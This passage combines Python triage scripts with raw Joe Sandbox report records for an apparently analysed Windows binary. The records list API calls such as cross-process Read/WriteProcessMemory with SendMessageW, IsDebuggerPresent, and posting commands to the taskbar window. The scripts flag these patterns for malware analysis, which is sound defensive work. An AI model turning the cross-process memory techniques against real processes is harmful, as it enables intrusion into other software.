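    0x1073: "LVM_GETITEMTEXTW",   # lParam -> LVITEM + text buffer in the target process
    0x110A: "TVM_GETNEXTITEM",
    0x133E: "TCM_INSERTITEMW",
}
# Messages whose lParam is a pointer; sending them across processes needs a
# remote buffer (VirtualAllocEx + WriteProcessMemory / ReadProcessMemory).
POINTER_MESSAGES = {0x102B, 0x1073}
CROSS_PROCESS_APIS = {"ReadProcessMemory", "WriteProcessMemory"}

# "• Name.MODULE(args), ref: ..." with an optional "Part of subcall function X:" prefix.
CALL_RE = re.compile(r"•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
                     r"(\w+)\.(\w+)\(([^)]*)\)")
FIELD_RE = re.compile(r"•\s*(Opcode ID|API ID|String ID):\s*(.*)")

# Constructed sample: three records from this page, trimmed to the fields the parser reads.
SAMPLE = """\
APIs
  • Part of subcall function 00D314BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D29296), ref: 00D314E6
• SendMessageW.USER32(?,0000102B,?,00000000), ref: 00D29509
• SendMessageW.USER32(?,0000102B,?,00000000), ref: 00D2952E
Strings
Similarity
• API ID: MessageSend$MemoryProcessWrite
• String ID: @U=u
• Opcode ID: c4fbd68242d3fd7107e12a119fa21065aeca11da3144e2e693b80dbb03fc3707
APIs
• SendMessageW.USER32(?,00000406,00000000,00000000), ref: 00D295FB
• SendMessageW.USER32(?,0000040D,?,00000000), ref: 00D2962E
  • Part of subcall function 00D31487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D292C5), ref: 00D314B1
  • Part of subcall function 00CD7BCC: _memmove.LIBCMT ref: 00CD7C06
Strings
Similarity
• API ID: MessageSend$MemoryProcessRead_memmove
• String ID: @U=u
• Opcode ID: f9f84157253be28e94277b9ae017a283a79100cc99be220c4d9e28f15c69cb85
APIs
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00D2954C
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00D29564
Strings
Similarity
• API ID: MessageSend
• String ID: @U=u
• Opcode ID: 1010aaf6b12f69d92fa82f402b1115e65b7aff2cbff7ced4693d2aa02c6ea8a2
"""


def decode_message(msg):
    """Symbolic name for a window-message ID, or WM_USER+n for control-specific values."""
    if msg in MESSAGE_NAMES:
        return MESSAGE_NAMES[msg]
    if WM_USER <= msg < 0x0800:
        return "WM_USER+%d" % (msg - WM_USER)   # meaning depends on the control class
    return "0x%04X" % msg


def parse_records(text):
    """Split the listing into per-function records; each starts at an 'APIs' heading."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = {"calls": [], "messages": [], "opcode_id": None}
            records.append(current)
            continue
        if current is None:
            continue
        m = CALL_RE.match(line)
        if m:
            name, args = m.group(1), m.group(3).split(",")
            current["calls"].append((name, m.group(2)))
            if name == "SendMessageW" and len(args) >= 2:
                try:
                    current["messages"].append(int(args[1], 16))
                except ValueError:
                    pass   # message argument unresolved ('?') in the listing
            continue
        f = FIELD_RE.match(line)
        if f:
            current[f.group(1).lower().replace(" ", "_")] = f.group(2)
    return records


def triage(text):
    """Flag functions that pair SendMessageW with Read/WriteProcessMemory."""
    findings = []
    for rec in parse_records(text):
        names = {n for n, _ in rec["calls"]}
        findings.append({
            "opcode_id": rec.get("opcode_id"),
            "messages": [decode_message(m) for m in rec["messages"]],
            "pointer_lparam": any(m in POINTER_MESSAGES for m in rec["messages"]),
            "cross_process": "SendMessageW" in names and bool(names & CROSS_PROCESS_APIS),
        })
    return findings


if __name__ == "__main__":
    for hit in triage(SAMPLE):
        if hit["cross_process"]:
            print(hit["opcode_id"][:12], hit["messages"], "pointer lParam:", hit["pointer_lparam"])
```

Run it against a saved copy of the whole function listing rather than the embedded excerpt to get the complete set of cross-process helpers; the remaining SendMessageW-only records (0x1004/0x102C, 0x110A, 0x133E, the WM_USER+1 button case) are ordinary in-process GUI handling and do not need the remote buffer.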
                                                            APIs
                                                              • Part of subcall function 00CD2612: GetWindowLongW.USER32(?,000000EB), ref: 00CD2623
                                                            • DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,00D0B93A,?,?,?), ref: 00D5C5F1
                                                              • Part of subcall function 00CD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00CD25EC
                                                            • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00D5C5D7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: LongWindow$MessageProcSend
                                                            • String ID: @U=u
                                                            • API String ID: 982171247-2594219639
                                                            • Opcode ID: bebc42323b7c4adc48e7e34f8b902a4bdce2c4490c31040563cae83fc2c00524
                                                            • Instruction ID: 7da67b8f5838cff9ebf46cfc87ce4f15ca0d536a4983150265267862756188b2
                                                            • Opcode Fuzzy Hash: bebc42323b7c4adc48e7e34f8b902a4bdce2c4490c31040563cae83fc2c00524
                                                            • Instruction Fuzzy Hash: EA019231200314AFCF225F54DC44E6A3BA6FB85361F140525FE415B7A0DB31A905DB70
                                                            APIs
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00D2954C
                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00D29564
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: @U=u
                                                            • API String ID: 3850602802-2594219639
                                                            • Opcode ID: 1010aaf6b12f69d92fa82f402b1115e65b7aff2cbff7ced4693d2aa02c6ea8a2
                                                            • Instruction ID: abb93b8fa8eefffca17eaa9c92e6b1728790533582d389312881a17013859912
                                                            • Opcode Fuzzy Hash: 1010aaf6b12f69d92fa82f402b1115e65b7aff2cbff7ced4693d2aa02c6ea8a2
                                                            • Instruction Fuzzy Hash: 2EE02B3534233176F2311625AC5AFD79E49DB98B65F140034BB01991D1C9D24D8282B0
                                                            APIs
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00D29CD8
                                                            • SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00D29D08
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: @U=u
                                                            • API String ID: 3850602802-2594219639
                                                            • Opcode ID: d8f70ce11549a2aa8955e7bc507d8bb852cad7403629230484eaa42a6c03b74e
                                                            • Instruction ID: 20cb91ee4c432406e4e72b2d40361506717246f7b3a2d9a8b0345273409d0166
                                                            • Opcode Fuzzy Hash: d8f70ce11549a2aa8955e7bc507d8bb852cad7403629230484eaa42a6c03b74e
                                                            • Instruction Fuzzy Hash: 5CF0A036240324BFEA116B90EC56FEA7B58EB28766F100025FB415E1E1D9E25C40A7B0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ClassName_wcscmp
                                                            • String ID: #32770
                                                            • API String ID: 2292705959-463685578
                                                            • Opcode ID: 298a8665a05ce6eb078976fd8d5712aff2582e3815f64e40ea02bb7d2a127854
                                                            • Instruction ID: f818fbb6cefd946b479f8243b7ef1bc7f608798b722e72c93ad6c1c2ee8ddab1
                                                            • Opcode Fuzzy Hash: 298a8665a05ce6eb078976fd8d5712aff2582e3815f64e40ea02bb7d2a127854
                                                            • Instruction Fuzzy Hash: FDE092326003282AD720AB99EC49AA7F7ACEB85B71F010067FD04D6151D960AA4587F1
                                                            APIs
                                                              • Part of subcall function 00D0B314: _memset.LIBCMT ref: 00D0B321
                                                              • Part of subcall function 00CF0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00D0B2F0,?,?,?,00CD100A), ref: 00CF0945
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,00CD100A), ref: 00D0B2F4
                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00CD100A), ref: 00D0B303
                                                            Strings
                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00D0B2FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                            • API String ID: 3158253471-631824599
                                                            • Opcode ID: 24a47d8ca96724e96c2c9b0d902615b239c4239aec728ad34d23376770c2b12d
                                                            • Instruction ID: 286b98de206606fbeac2737c7ed6ba1093f0fa7ca49633835ed81faf0a152cfd
                                                            • Opcode Fuzzy Hash: 24a47d8ca96724e96c2c9b0d902615b239c4239aec728ad34d23376770c2b12d
                                                            • Instruction Fuzzy Hash: 72E06DB02047408FE7209F28E8043567AE4AF00714F10896EE88AC7791E7B4E444CBB1
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(?), ref: 00D11775
                                                              • Part of subcall function 00D4BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00D1195E,?), ref: 00D4BFFE
                                                              • Part of subcall function 00D4BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00D4C010
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00D1196D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                            • String ID: WIN_XPe
                                                            • API String ID: 582185067-3257408948
                                                            • Opcode ID: ff1f4c8ffc1e1e9eff2d4d8029b17134c19dda6927e7b4a73ea1bca4ef482515
                                                            • Instruction ID: 781e6968287718f1058e4e551de9219a921709017fb7101b828a30ff3e02eb9c
                                                            • Opcode Fuzzy Hash: ff1f4c8ffc1e1e9eff2d4d8029b17134c19dda6927e7b4a73ea1bca4ef482515
                                                            • Instruction Fuzzy Hash: 18F0C974804209EFDB15DFA1D988AECBBF8AB18302F540096E202A6290DB718F85DF71
                                                            APIs
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00D559AE
                                                            • PostMessageW.USER32(00000000), ref: 00D559B5
                                                              • Part of subcall function 00D35244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00D352BC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: FindMessagePostSleepWindow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 529655941-2988720461
                                                            • Opcode ID: e58ccf324f813539bc1f205323a6a6e4d442b18b69391731a9f52ab40b1f294c
                                                            • Instruction ID: 34f7a0f907f1a1b799d81b43729d6fb57de33542db8d9113b4d49f0159ef8fc4
                                                            • Opcode Fuzzy Hash: e58ccf324f813539bc1f205323a6a6e4d442b18b69391731a9f52ab40b1f294c
                                                            • Instruction Fuzzy Hash: 71D0C9353C0311BBE664BB70EC0BF976614AB05B52F000875B745EF2D0D9E0A800C678
                                                            APIs
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00D5596E
                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00D55981
                                                              • Part of subcall function 00D35244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00D352BC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: FindMessagePostSleepWindow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 529655941-2988720461
                                                            • Opcode ID: 153ea0bced6df0383f570831f78a77db3641f1e82002148a609a1c0ac026094b
                                                            • Instruction ID: abb5fce8addd1acb8e3bc0b8973e2bd366d7e5c583c125b8f3e99e3999ec056b
                                                            • Opcode Fuzzy Hash: 153ea0bced6df0383f570831f78a77db3641f1e82002148a609a1c0ac026094b
                                                            • Instruction Fuzzy Hash: C8D0C935384311BBE664BB70EC0BF976A14AB00B52F000875B749EF2D0D9E09800C674
                                                            APIs
                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00D293E9
                                                            • SendMessageW.USER32(00000000,00001200,00000000,00000000), ref: 00D293F7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: @U=u
                                                            • API String ID: 3850602802-2594219639
                                                            • Opcode ID: da174b7f9c7db6ad28024f0c728ef82f27007995013db377a74f98a90cc902d0
                                                            • Instruction ID: 6b203992e571482bbb03c138a4a07ec5343c7fd7beb6483851298dc0495116f0
                                                            • Opcode Fuzzy Hash: da174b7f9c7db6ad28024f0c728ef82f27007995013db377a74f98a90cc902d0
                                                            • Instruction Fuzzy Hash: 03C00231141380BAEA211B77AC0DD873E7DE7CAF52B11056CB611D91B586650095D634
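The "APIs" lines of the three records above can be triaged mechanically rather than read by eye. The Python below is an added example, not part of the Joe Sandbox report and not code from the analyzed sample: it parses lines in the plugin's `Name.MODULE(args), ref: addr` layout, converts each call-site address to an RVA using the image base the report states for this dump (Offset: 00CD0000), resolves the window-message constants that occur in these records from the Windows SDK headers (0x0111 WM_COMMAND, 0x101F LVM_GETHEADER, 0x1200 HDM_GETITEMCOUNT), and flags a FindWindowW("Shell_TrayWnd") lookup followed by a WM_COMMAND post to that handle. The sample input is the API lines copied from the records above. The helper name `taskbar_command_posts` and the flagging heuristic are this example's own; the wParam 0x197 (407) is passed through undecoded because the report does not identify which taskbar command it selects.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Image base of the dumped module, as stated in the report's "Memory Dump Source"
# lines ("Offset: 00CD0000, based on PE: true").
IMAGE_BASE = 0x00CD0000

# Window-message constants that occur in these records, from the Windows SDK headers.
WINDOW_MESSAGES = {
    0x0111: "WM_COMMAND",
    0x101F: "LVM_GETHEADER",     # LVM_FIRST (0x1000) + 31
    0x1200: "HDM_GETITEMCOUNT",  # HDM_FIRST (0x1200) + 0
}

MESSAGE_APIS = {"SendMessageA", "SendMessageW", "PostMessageA", "PostMessageW"}

# One "APIs" line of the Joe Sandbox IDA plugin output, for example
#   • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00D559AE
#   • Part of subcall function 00D35244: Sleep.KERNEL32(?,00000000), ref: 00D352BC
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*?)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]               # raw argument strings; "?" means the plugin could not recover the value
    ref: int                      # virtual address of the call site
    subcall_of: Optional[int] = None

    @property
    def rva(self) -> int:
        """Call-site offset relative to the image base, stable across relocations."""
        return self.ref - IMAGE_BASE

    def message(self) -> Optional[str]:
        """Symbolic name of the uMsg argument for Send/PostMessage calls, else None."""
        if self.api not in MESSAGE_APIS or len(self.args) < 2:
            return None
        try:
            msg = int(self.args[1], 16)
        except ValueError:        # "?" placeholder for an unrecovered argument
            return None
        return WINDOW_MESSAGES.get(msg, f"0x{msg:04X}")


def parse_api_lines(text: str) -> List[ApiCall]:
    """Extract every API call line from a block of plugin output, in order."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(
            api=m["api"], module=m["module"], args=args,
            ref=int(m["ref"], 16),
            subcall_of=int(m["sub"], 16) if m["sub"] else None,
        ))
    return calls


def taskbar_command_posts(calls: List[ApiCall]) -> List[ApiCall]:
    """Hypothetical triage helper: WM_COMMAND Send/PostMessage calls that follow the most
    recent FindWindow("Shell_TrayWnd") lookup. The report lists the calls; it does not
    name the taskbar command that wParam selects, so that value is left undecoded."""
    hits, saw_tray = [], False
    for c in calls:
        if c.api.startswith("FindWindow") and c.args and c.args[0] == "Shell_TrayWnd":
            saw_tray = True
        elif saw_tray and c.message() == "WM_COMMAND":
            hits.append(c)
            saw_tray = False
    return hits


# The "APIs" lines of the three records above, copied from the report.
SAMPLE = """\
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00D559AE
• PostMessageW.USER32(00000000), ref: 00D559B5
  • Part of subcall function 00D35244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00D352BC
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00D5596E
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00D55981
  • Part of subcall function 00D35244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00D352BC
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00D293E9
• SendMessageW.USER32(00000000,00001200,00000000,00000000), ref: 00D293F7
"""

if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE)
    for c in calls:
        print(f"RVA {c.rva:06X}  {c.api}.{c.module}  msg={c.message()}  args={c.args}")
    for c in taskbar_command_posts(calls):
        print(f"WM_COMMAND to Shell_TrayWnd at {c.ref:08X}, wParam={c.args[2]}")
```

The RVA is the value to carry into other tooling (a YARA hit offset, a breakpoint in a debugger run of the same sample) because the report's `ref` addresses are tied to the 0x00CD0000 load address of this particular run. The first record's PostMessageW has only its hwnd recovered, so `message()` returns None for it and only the second record's call is flagged.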